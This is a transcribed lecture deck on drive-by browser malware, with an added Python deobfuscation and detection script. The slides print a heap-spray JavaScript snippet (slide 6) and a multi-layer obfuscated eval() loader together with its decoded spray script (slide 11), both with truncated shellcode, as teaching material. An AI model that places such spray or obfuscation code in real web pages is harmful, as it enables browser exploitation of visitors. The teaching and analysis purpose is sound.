CSE484/CSE584 DRIVE-BY MALWARE, Dr. Benjamin Livshits, Final Project (PowerPoint PPT presentation)



  1. CSE484/CSE584 DRIVE-BY MALWARE. Dr. Benjamin Livshits

  2. Final Project
     • How many of you have your teams fully formed?
     • How many of you are still looking for a team?
     • How many of you have a copy of the book A Bug Hunter's Diary?
     • How many of you have built Firefox from the source?

  3. Project Schedule
     • 4 project-oriented sections
     • Teams fully formed by 11/13 midnight
     • Proposals are due by 11/17 (Monday 5pm)
     • Ethics form (Friday 5pm)
     • There's a proposal document
     Section topics:
     • 11/13 (today!): Getting the source and building it. Debugging the source code. Following the flow. Using source browsing and search tools. Bug repositories. Advanced searches.
     • 11/18: Fuzzing file formats with specialized tools. Using memory inspection tools such as Valgrind and Address Sanitizer.

  4. Brief History of Memory-Based Exploits
     • 1999: Melissa
     • 2000: Stack-based overruns
     • 2001: CodeRed
     • 2002: Nimda
     • 2002: Heap-based overruns
     • 2005: Drive-by attacks and heap sprays
     (The slide brackets the entries from 2000 onward as "memory-based exploits".)

  5. What is a Drive-By Attack? 0wned!

  6. Drive-By Attack Example: Heap Spraying
     Diagram: the browser heap drawn as a row of blocks marked "bad" and "ok"; the script below allocates 1,000s of malicious objects.

     <SCRIPT language="text/javascript">
     shellcode = unescape("%u4343%u4343%...");
     oneblock = unescape("%u0C0C%u0C0C");
     var fullblock = oneblock;
     while (fullblock.length<0x40000) {
       fullblock += fullblock;
     }
     sprayContainer = new Array();
     for (i=0; i<1000; i++) {
       sprayContainer[i] = fullblock + shellcode;
     }
     </SCRIPT>

  7. Heap Spraying: Firefox 3.5, July 14, 2009. http://www.web2secure.com/2009/07/mozilla-firefox-35-heap-spray.html

  8. More Complex Malware

  9. Drive-by downloads: THIS IS ONE OF THE KEY REASONS WHY BROWSER VULNERABILITIES ARE SO VALUABLE

  10. Aspects of Drive-By Malware
     • Attacks
       – Browser: what is mostly affected?
       – Browser plugins: what is affected in plugins? Why are plugins most open to exploitation?
     • Vulnerabilities
       – Dangling pointers
       – Double frees
       – Buffer overruns are harder
     • Malware is highly obfuscated
       – Obfuscation changes all the time

  11. Obfuscation
     The slide shows the same sample in three columns: two encoder layers that build code for eval() one character at a time, and the heap-spray script they unwrap to.

     Column 1: string fragments with look-alike names (capital O and lowercase l) are concatenated into the definition of a helper l(x); their eval() yields "var l = function(x){return String.fromCharCode(x)}".
     OlOlll="(x)";
     OllOlO=" String";
     OlllOO="tion";
     OlOllO="Code(x)}";
     OllOOO="Char";
     OlllOl="func";
     OllllO=" l = ";
     OllOOl=".from";
     OllOll="{return";
     Olllll="var";
     eval (Olllll+OllllO+OlllOl+OlllOO+OlOlll+OllOll+OllOlO+OllOOl+OllOOO+OlOllO);

     Column 2: l(x) wraps String.fromCharCode, and the l() calls spell out the definition of a second helper O(m), which maps a large integer to one character.
     var l = function (x) {
       return String.fromCharCode(x);
     }
     eval (l(79)+l(61)+l(102)+l(117)+l(110)+l(99)+l(116)+l(105)+l(111)+l(110)+l(40)+l(109)+l(41)+l(123)+l(114)+l(101)+l(116)+l(117)+l(114)+l(110)+l(32)+l(83)+l(116)+l(114)+l(105)+l(110)+l(103)+l(46)+l(102)+l(114)+l(111)+l(109)+l(67)+l(104)+l(97)+l(114)+l(67)+l(111)+l(100)+l(101)+l(40)+l(77)+l(97)+l(116)+l(104)+l(46)+l(102)+l(108)+l(111)+l(111)+l(114)+l(40)+l(109)+l(47)+l(49)+l(48)+l(48)+l(48)+l(48)+l(41)+l(47)+l(50)+l(41)+l(59)+l(125));

     var O = function (m){
       return String.fromCharCode( Math.floor(m / 10000) / 2);
     }
     eval (""+O(2369522)+O(1949494)+O(2288625)+O(648464)+O(2304124)+O(2080995)+O(2020710)+O(2164958)+O(2168902)+O(1986377)+O(2227903)+O(2005851)+O(2021303)+O(646435)+O(1228455)+O(644519)+O(2346826)+O(2207788)+O(2023127)+O(2306806)+O(1983560)+O(1949296)+O(2245968)+O(2028685)+O(809214)+O(680960)+O(747602)+O(2346412)+O(1060647)+O(1045327)+O(1381007)+O(1329180)+O(745897)+O(2341404)+O(1109791)+O(1064283)+O(1128719)+O(1321055)+O(748985)+...);

     Column 3: the heap-spray script the O() calls decode to (the slide's excerpt is truncated; slackspace and fillblock are set earlier in the sample and are not shown).
     shellcode = unescape( "%u54EB%u758B…" );
     var bigblock = unescape("%u0c0c%u0c0c");
     while (bigblock.length<slackspace) {
       bigblock += bigblock;
     }
     block = bigblock.substring(0, bigblock.length-slackspace);
     while (block.length+slackspace<0x40000) {
       block = block + block + fillblock;
     }
     memory = new Array();
     for (x=0; x<300; x++) {
       memory[x] = block + shellcode;
     …
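As an added example (not from the slides, Malzilla or any other tool they show), a Python script that statically emulates the slide's l() and O() encoder functions to recover the text each eval() layer assembles, without ever running the sample, and then checks a script for the heap-spray traits from slide 6. The indicator names, the regexes and the stand-in spray sample are assumptions of this example; the encoded call arguments are the ones printed on the slide.

```python
import re

# Static emulation of the slide's two encoder functions (no eval needed):
# l(x) is String.fromCharCode(x); O(m) is String.fromCharCode(Math.floor(m/10000)/2),
# where fromCharCode truncates a trailing .5 (ToUint16), hence the integer division.
CALL_RE = re.compile(r"\b([lO])\((\d+)\)")

def decode_layer(js: str) -> str:
    """Return the text an eval(l(..)+l(..)+...) or eval(""+O(..)+...) layer assembles."""
    return "".join(chr(int(n)) if f == "l" else chr(int(n) // 10000 // 2)
                   for f, n in CALL_RE.findall(js))

# Heap-spray traits from slide 6: a repeated %u0c0c filler block, a block-doubling
# loop, and an array fill that appends the shellcode to every block (assumed regexes).
SPRAY_SIGNS = {
    "filler_block": r'unescape\(\s*"(?:%u0c0c)+"\s*\)',
    "doubling_loop": r"while\s*\([^)]*\.length\s*<[^)]*\)\s*\{[^}]*\+=",
    "array_fill": r"for\s*\([^)]*\)\s*\{[^}]*\[\s*\w+\s*\]\s*=\s*\w+\s*\+\s*shellcode",
}

def spray_indicators(js: str) -> list:
    """Names of the heap-spray traits present in a (deobfuscated) script."""
    return sorted(name for name, rx in SPRAY_SIGNS.items() if re.search(rx, js, re.I))
# Encoded arguments copied from the slide's two eval() layers; the O list is
# truncated on the slide, so its decoded text stops where the slide's "..." does.
L_ARGS = [79, 61, 102, 117, 110, 99, 116, 105, 111, 110, 40, 109, 41, 123, 114, 101, 116,
          117, 114, 110, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104,
          97, 114, 67, 111, 100, 101, 40, 77, 97, 116, 104, 46, 102, 108, 111, 111, 114, 40,
          109, 47, 49, 48, 48, 48, 48, 41, 47, 50, 41, 59, 125]
O_ARGS = [2369522, 1949494, 2288625, 648464, 2304124, 2080995, 2020710, 2164958, 2168902,
          1986377, 2227903, 2005851, 2021303, 646435, 1228455, 644519, 2346826, 2207788,
          2023127, 2306806, 1983560, 1949296, 2245968, 2028685, 809214, 680960, 747602,
          2346412, 1060647, 1045327, 1381007, 1329180, 745897, 2341404, 1109791, 1064283,
          1128719, 1321055, 748985]
LAYER_L = "eval(" + "+".join(f"l({n})" for n in L_ARGS) + ");"
LAYER_O = 'eval(""+' + "+".join(f"O({n})" for n in O_ARGS) + "+...);"

# Constructed stand-in for slide 6's spray script (filler only, no real shellcode).
SAMPLE_SPRAY = """shellcode = unescape("%u4343%u4343");
oneblock = unescape("%u0C0C%u0C0C");
var fullblock = oneblock;
while (fullblock.length<0x40000) { fullblock += fullblock; }
sprayContainer = new Array();
for (i=0; i<1000; i++) { sprayContainer[i] = fullblock + shellcode; }"""

if __name__ == "__main__":
    print(decode_layer(LAYER_L))           # the hidden definition of O()
    print(decode_layer(LAYER_O))           # the start of the decoded spray script
    print(spray_indicators(SAMPLE_SPRAY))  # ['array_fill', 'doubling_loop', 'filler_block']
```

Decoding statically this way keeps the analyst from executing attacker-controlled code; once a layer is unwrapped, the indicator check is run on the recovered text rather than on the encoded wrapper.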

  12. More Obfuscated Code

  13. Malzilla

  14. Malzilla (2)

  15. Decoders

  16. Disassemble?

  17. And More
